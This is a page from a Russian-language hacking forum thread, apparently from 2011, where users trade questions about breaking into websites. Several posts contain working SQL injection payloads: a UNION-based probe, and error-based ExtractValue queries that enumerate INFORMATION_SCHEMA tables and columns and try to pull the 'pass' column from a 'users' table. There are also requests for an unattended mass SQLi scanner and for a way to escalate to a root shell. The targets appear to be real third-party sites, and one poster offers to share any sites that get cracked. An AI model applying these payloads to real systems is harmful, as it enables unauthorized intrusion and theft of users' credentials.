HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1847 из 2438 « Первая < 8471347174717971837 1843 1844 1845 1846 1847 1848 1849 1850 1851 1857189719472347 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #18461  
Старый 02.11.2011, 16:52
omg_it_glowZ
Guest
Сообщений: n/a
Провел на форуме:
12399

Репутация: -2
По умолчанию
Есть сайтец, на нем у меня неполные права у текущего юзера. Есть файл другого пользователя с правами root, который я могу редактировать, но он html, смогу ли я как-то получить шелл этого пользователя? Если да, то как?
 
Ответить с цитированием

  #18462  
Старый 02.11.2011, 20:05
crackforme
Guest
Сообщений: n/a
Провел на форуме:
43818

Репутация: 0
По умолчанию
сделал @@version() вышло 5.1.41-3ubuntu12.10

кто-нибудь сталкивался с таким? какие дальнейшие действия?
 
Ответить с цитированием

  #18463  
Старый 02.11.2011, 20:49
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от crackforme  
crackforme said:
сделал @@version() вышло 5.1.41-3ubuntu12.10
кто-нибудь сталкивался с таким? какие дальнейшие действия?
Ну крути дальше.

Фильтруется либо @ либо ( и ), это как повезет.

Проверь @@version, если получишь результат тот же что и @@version(), то фильтруется скобки. Очевидно же.
 
Ответить с цитированием

  #18464  
Старый 03.11.2011, 03:45
lion-art
Guest
Сообщений: n/a
Провел на форуме:
7046

Репутация: 1
По умолчанию
Прошу помощи

инъекция вида:

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,

ответ:

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

И далее плохая новость ничего не выходит с числами, сколько бы не подставлял.

Но есть и хорошая

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0'

в конце кавычка и ответ уже:

Invalid query: The used SELECT statements have a different number of columns

Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу.

+ сайт с xss есть но об этом позже =)

если что сайт на Apache/2.2.17
 
Ответить с цитированием

  #18465  
Старый 03.11.2011, 04:12
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
ссылку покажи
 
Ответить с цитированием

  #18466  
Старый 03.11.2011, 13:25
omg_it_glowZ
Guest
Сообщений: n/a
Провел на форуме:
12399

Репутация: -2
По умолчанию
Может немного не в той теме. Хотел узнать:

Какая программа проверяет ссылки на наличие скули, но не интересуют программы, которые просто ищут ошибку при подстановке " ' ".

Нужно нечто вроде sqlmap, но способная брать список из файла и не требующая никакого ввода от пользователя (скорость работы не особо важна, главное - качество :3)

Также устроит, если кто-нибудь подскажет как можно это осуществить через sqlmap
 
Ответить с цитированием

  #18467  
Старый 03.11.2011, 13:33
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию
NetDevilz SQL Scanner в гугл пропиши
 
Ответить с цитированием

  #18468  
Старый 03.11.2011, 14:46
s000r
Guest
Сообщений: n/a
Провел на форуме:
2918

Репутация: 0
По умолчанию
Blind SQL Injection

Добрый день уважаемые форумчане.

Помогите разобраться в чем проблема, замучился уже.

Суть проблемы:

Дергаю названия таблиц так:

Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+table_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)))--
Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы.

Пошел дальше, получил списки всех таблиц.

одна из них users

Получаю название колонок:

Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+column_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+0,1)))--
Получил все нормально.

Теперь надо выдернуть значения.

Делаю так:

Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+pass+from+users+LIMIT+0,1)))--
В ответ получаю:

Код:
Code:
mysql error: Unknown column 'pass' in 'field list'
Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass?

ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.
 
Ответить с цитированием

  #18469  
Старый 03.11.2011, 14:55
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию
Мб захексишь?
 
Ответить с цитированием

  #18470  
Старый 03.11.2011, 14:59
s000r
Guest
Сообщений: n/a
Провел на форуме:
2918

Репутация: 0
По умолчанию
Код:
Code:
obid=id+and+ExtractValue(1,concat(0x5c,(select+UNHEX(HEX(pass))+from+users+LIMIT+0,1)))--
Выдает:

Код:
Code:
mysql error: Unknown column 'pass' in 'field list'
 
Ответить с цитированием
Ответ
Страница 1847 из 2438 « Первая < 8471347174717971837 1843 1844 1845 1846 1847 1848 1849 1850 1851 1857189719472347 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ